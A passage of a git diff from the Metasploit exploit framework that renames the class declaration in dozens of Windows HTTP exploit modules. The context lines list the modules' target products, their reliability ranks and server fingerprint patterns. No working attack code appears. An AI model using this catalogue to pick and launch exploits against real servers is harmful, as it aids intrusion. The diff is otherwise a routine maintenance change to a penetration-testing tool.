ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index ed9ddab692..e409da7372 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 40eb5cab67..92ef605294 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index db9a37d637..0f943908b5 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 3215be533a..2d4f0e3dd0 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index a221aebd55..c9d975e7db 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 9310991d96..9b3c96e2e8 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index d6802c853e..db7349f2b9 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -19,7 +19,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] } diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index bb0bf66cdc..3c6c307d55 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index d20b2d65ea..858761d5b2 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 7ce4a44b51..20350f46d3 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index fba7ae256a..5fc1f2e280 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index b7e738d5b4..02a2577049 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index eab3afafdd..f8d661fd61 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 1b8962d096..7fa35f9262 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # stack bof, seh, universal ret, auto targeting include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 6cec7edfd1..5015245f56 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] } diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 936bfb0e44..ef301edbab 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index c5ce138480..f77b24d91c 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index 1fcd7c1d38..3d9068f693 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index a481ff4676..4fa901af14 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index ab0204bfc9..8037a95ec3 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index afd75aa97d..e0b5dc2d8d 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] } diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index bac17e0e49..9dac1e3d1a 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 39c4b04f60..367e93543a 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 83fd3da795..0d0fd3e481 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /MailEnable/ ] } diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 18ae25b9b5..f707b34c05 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index e017dd250a..ebbada86aa 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/manageengine_connectionid_write.rb b/modules/exploits/windows/http/manageengine_connectionid_write.rb index e69b65abee..2cd98114c1 100644 --- a/modules/exploits/windows/http/manageengine_connectionid_write.rb +++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 1764bf01ea..f9e6f01222 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 4488698868..5f6da07f06 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 5a33167929..42d991ab2d 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 3f17071de0..f6ae402ff7 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index f02594d536..ffdcf97b1d 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 9fe3d101c1..eb5fc32a50 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /MiniWeb/ ] } diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index d9c46a3d2a..4298f850fb 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /InterVations/ ] } diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index b897f791b1..7d9bfc54af 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb index 9e400e9596..8e00ad258d 100644 --- a/modules/exploits/windows/http/netgear_nms_rce.rb +++ b/modules/exploits/windows/http/netgear_nms_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 466ddbbae6..465490a72b 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index b70727e917..aee9177369 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index d52305bdb8..0f80454e8c 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 05f4c9ecb3..5bbf6d1524 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 06b563e0cf..c59eeaa693 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/oracle_beehive_evaluation.rb b/modules/exploits/windows/http/oracle_beehive_evaluation.rb index 19dbbe04ce..0bb82f0dd7 100644 --- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb +++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb index 12a2318607..de558a196a 100644 --- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb +++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 7980ec25ae..81a88ca3d0 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index 3e8ce2702c..a48a151838 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 853c55c046..054f5b890e 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index e8f3f218c1..25b9326857 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 6d1632f045..d8e514ffab 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index 4b7e9feccf..04e9ee1427 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 3671981570..2ad78064a3 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 9c50701f47..f387140d39 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/rabidhamster_r4_log.rb b/modules/exploits/windows/http/rabidhamster_r4_log.rb index d63fe48e99..a4a1a1f186 100644 --- a/modules/exploits/windows/http/rabidhamster_r4_log.rb +++ b/modules/exploits/windows/http/rabidhamster_r4_log.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 41cbf1fae9..cce2a993c1 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index e4b0a0e1ed..060403088e 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 0ef0bb0f34..1b37036b59 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class MetasploitModule < Msf::Exploit Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index 06dc9a7abb..3ba0407e99 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 67ed566e16..7456fd6022 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] } diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index bf44556edd..e21b096884 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] } diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index bf935718d0..49b4f3ed2b 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index c4a78a8faa..5384e6cef6 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index aeb11ebc39..b95de3b057 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index f3dbbe7725..5255a61775 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include 